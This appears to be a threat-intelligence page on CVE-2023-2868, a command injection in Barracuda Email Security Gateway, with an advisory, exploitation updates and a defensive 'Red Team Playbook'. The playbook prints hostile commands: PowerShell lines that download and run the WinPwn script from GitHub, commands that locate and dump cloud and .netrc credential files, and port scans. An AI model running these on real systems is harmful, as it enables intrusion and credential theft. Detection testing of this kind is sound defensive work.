CVE-2023-2868

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 24/05 Upd 21/10

Overview

This vulnerability is a remote command injection caused by improper input validation of user-supplied .tar archive file names in the Barracuda Email Security Gateway appliance firmware versions 5.1.3.001 through 9.2.0.006. The flaw resides in the parsing logic that fails to sanitize file names within the .tar archive, enabling execution of system commands via Perl's qx operator. The affected component is the archive processing functionality of the Email Security Gateway appliance.

Vulnerability Description

A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.

Impact

An unauthenticated remote attacker can execute arbitrary system commands on the affected Barracuda Email Security Gateway appliance by delivering a malicious .tar archive with crafted file names. This grants the attacker the ability to run commands with the same privileges as the Email Security Gateway software, potentially leading to full system compromise, data exposure, or disruption of email security services. The exploit requires no user interaction or credentials, enabling remote takeover of vulnerable appliances.

Solution

Barracuda Networks issued patch BNSF-36456 to remediate this vulnerability in Email Security Gateway appliance firmware versions 5.1.3.001 through 9.2.0.006. This patch is automatically applied to all customer appliances. For detailed patch instructions and status updates, refer to Barracuda's official advisory at https://www.barracuda.com/company/legal/esg-vulnerability and https://status.barracuda.com/incidents/34kx82j5n4q9.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

A critical vulnerability has been identified in the Barracuda Email Security Gateway, specifically affecting its appliance form factor across multiple firmware versions. This issue arises from inadequate sanitization during the processing of .tar files, which are commonly used for file archiving. The vulnerability allows for incomplete input validation of user-supplied .tar files, particularly concerning the names of the files contained within these archives. An attacker can exploit this flaw by crafting malicious file names that, when processed, can lead to the execution of arbitrary system commands via Perl's qx operator. This execution occurs with the privileges of the Email Security Gateway, potentially granting the attacker significant control over the affected system.

The attack vector for this vulnerability is primarily remote, allowing an attacker to exploit the system without needing physical access. By submitting a specially crafted .tar file through the appropriate interface, an attacker can manipulate the file names in such a way that they trigger command execution on the server. This could be done through various means, such as phishing emails that contain the malicious archive or through compromised accounts that have legitimate access to the system. The exploitation of this vulnerability could lead to a wide range of malicious activities, including data exfiltration, unauthorized access to sensitive information, or even the complete takeover of the affected appliance.

The real-world impact of this vulnerability is significant, particularly for organizations relying on the Barracuda Email Security Gateway for their email security needs. The potential for remote command execution poses a severe business risk, as it could lead to data breaches, loss of sensitive information, and disruption of services. Organizations may face reputational damage, regulatory penalties, and financial losses as a result of a successful attack. Additionally, the presence of such a vulnerability could undermine customer trust, especially if the breach results in the exposure of personal or confidential data.

To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the Barracuda Email Security Gateway is crucial, as the vendor has already released a patch to address this issue. Organizations should also conduct routine security assessments and vulnerability scans to identify any potential weaknesses in their systems. Employing intrusion detection systems (IDS) can help monitor for unusual activity that may indicate an attempted exploitation of this vulnerability. Furthermore, educating employees about safe email practices and the risks associated with opening attachments from untrusted sources can significantly reduce the likelihood of successful exploitation.

In conclusion, the remote command injection vulnerability in the Barracuda Email Security Gateway presents a serious threat to organizations utilizing this product. The potential for exploitation through crafted .tar files underscores the importance of robust input validation and security practices. By understanding the technical details of the vulnerability, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future.




Recent updates to CVE-2023-2868 reveal a slight downward revision of its CVSS score from 9.8 to 9.4, reflecting a nuanced reassessment of its exploitability and impact. Concurrently, CSURFACE threat intelligence reports a significant reduction in detection activity related to this vulnerability, suggesting either a decline in active exploitation attempts or improved defensive postures among affected organizations. Despite this, the Exploit Prediction Scoring System (EPSS) score has marginally increased, indicating a modest rise in the likelihood of exploitation in the near term. Notably, publicly available proof-of-concept exploits remain limited, with no new repositories emerging, although a Metasploit module continues to provide a functional exploitation framework. This dynamic underscores a complex threat landscape where active exploitation pressure has eased, yet the vulnerability retains a critical risk profile due to its remote command injection nature and the availability of reliable exploit tools. For defenders, this means vigilance remains essential, as the vulnerability’s critical severity and persistent exploitability maintain a high threat level, even amid reduced observed activity. The updated risk assessment thus balances the observed decline in exploitation telemetry against the sustained potential for impactful compromise, affirming the need for continued monitoring and remediation efforts.



Update 2 — July 07, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-2868, accompanied by an upward revision of the CVSS score to 9.8, reflecting a heightened criticality of this remote command injection vulnerability. This increase in observed activity signals a resurgence of attacker interest, likely driven by the availability of a mature Metasploit module that facilitates reliable exploitation through crafted TAR file attachments. Although the Exploit Prediction Scoring System (EPSS) remains stable, the surge in telemetry underscores an elevated operational threat, emphasizing that adversaries are actively leveraging the vulnerability’s incomplete input validation to achieve remote code execution on Barracuda Email Security Gateway appliances. For defenders, this development highlights an increased likelihood of targeted attacks exploiting this vector, necessitating sustained vigilance despite previously observed easing in exploitation pressure. The updated risk assessment thus elevates the threat level to reflect both the intensifying exploitation activity and the critical impact potential inherent to this vulnerability, reinforcing its status as a high-priority concern within enterprise email security environments.



Update 3 — July 16, 2026

CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2023-2868, reflecting a clear uptick in attacker activity against vulnerable Barracuda Email Security Gateway appliances. This increase in telemetry signals heightened adversary interest and operational tempo, underscoring the vulnerability’s attractiveness as a remote command injection vector. Although the Exploit Prediction Scoring System (EPSS) remains stable, the observed escalation in real-world exploitation attempts elevates the immediacy of the threat. The availability of a Metasploit module further lowers the barrier for threat actors to weaponize this flaw, potentially broadening the attacker base beyond highly skilled operators. Consequently, the risk posture for organizations running affected Barracuda ESG firmware has intensified, warranting elevated prioritization within security monitoring and incident response frameworks. This development reinforces the criticality of this vulnerability as a persistent and actively exploited threat within enterprise email security environments.



Update 4 — August 01, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-2868, with telemetry indicating a substantial increase in malicious activity leveraging this vulnerability. The EPSS score has inched upward, reflecting growing confidence in the exploitability and likelihood of successful attacks. Notably, the availability and refinement of a Metasploit module continue to lower the technical barrier for threat actors, facilitating broader adoption of this exploit beyond highly skilled adversaries. This surge in activity underscores an elevated risk environment for organizations running vulnerable versions of the Barracuda Email Security Gateway appliance, as attackers increasingly weaponize crafted TAR file attachments to achieve remote command execution. The evolving threat landscape demands heightened vigilance, as the combination of rising exploitation attempts and accessible tooling significantly amplifies the potential impact and reach of this critical vulnerability.



Update 5 — August 19, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-2868, reflecting a modest uptick in attacker activity against vulnerable Barracuda Email Security Gateway appliances. While the overall exploit trend remains stable, the availability of a Metasploit module continues to lower the technical barrier for adversaries, enabling a broader range of threat actors to weaponize this remote command injection vulnerability. Our telemetry indicates that attackers persist in leveraging crafted TAR file attachments containing shell metacharacters to achieve remote code execution, sustaining pressure on affected environments. Although ransomware involvement remains unconfirmed, the persistent exploitation attempts underscore an ongoing risk that could facilitate further compromise or lateral movement within targeted networks. This development maintains the critical threat level, emphasizing the need for continued monitoring as exploitation remains active and accessible through publicly available tooling.

Affected Products (5)

Vendor Product Version CPE
barracuda Barracuda Email Security Gateway 300 Firmware All cpe:2.3:o:barracuda:email_security_gateway_300_firmware:*:*:*:*:*:*:*:*
barracuda Barracuda Email Security Gateway 400 Firmware All cpe:2.3:o:barracuda:email_security_gateway_400_firmware:*:*:*:*:*:*:*:*
barracuda Barracuda Email Security Gateway 600 Firmware All cpe:2.3:o:barracuda:email_security_gateway_600_firmware:*:*:*:*:*:*:*:*
barracuda Barracuda Email Security Gateway 800 Firmware All cpe:2.3:o:barracuda:email_security_gateway_800_firmware:*:*:*:*:*:*:*:*
barracuda Barracuda Email Security Gateway 900 Firmware All cpe:2.3:o:barracuda:email_security_gateway_900_firmware:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Barracuda ESG TAR Filename Command Injection
exploits/linux/smtp/barracuda_esg_tarfile_rce
Mandiant, cfielding-r7, Curt Hyvarinen Unknown - View

GitHub PoCs (3)

Repository Author Stars Forks Date Link
cfielding-r7/poc-cve-2023-2868
cfielding-r7 11 6 2023-06-20 View
cashapp323232/CVE-2023-2868CVE-2023-2868
cashapp323232 0 0 2023-07-30 View
krmxd/CVE-2023-2868
krmxd 0 0 2023-08-25 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

23 events
2026-08-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2023-06-20
PoC Published (3 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2023-05-26
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2023-05-23
Exploit Published (0 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

OS Command Injection
100% command_injection
Improper Input Validation
65% input_validation
Remote Code Execution
46% rce

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-183 IMAP/SMTP Command Injection
47%
Medium
CAPEC-248 Command Injection
47%
Medium High
CAPEC-43 Exploiting Multiple Input Interpretation Layers
40%
Medium High
CAPEC-40 Manipulating Writeable Terminal Devices
34%
High Very High
CAPEC-75 Manipulating Writeable Configuration Files
30%
High Very High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (4)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2023-2868
barracuda.com
GitHub CVE
https://www.barracuda.com/company/legal/esg-vulnerability
status.barracuda.com
GitHub CVE
https://status.barracuda.com/incidents/34kx82j5n4q9
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-2868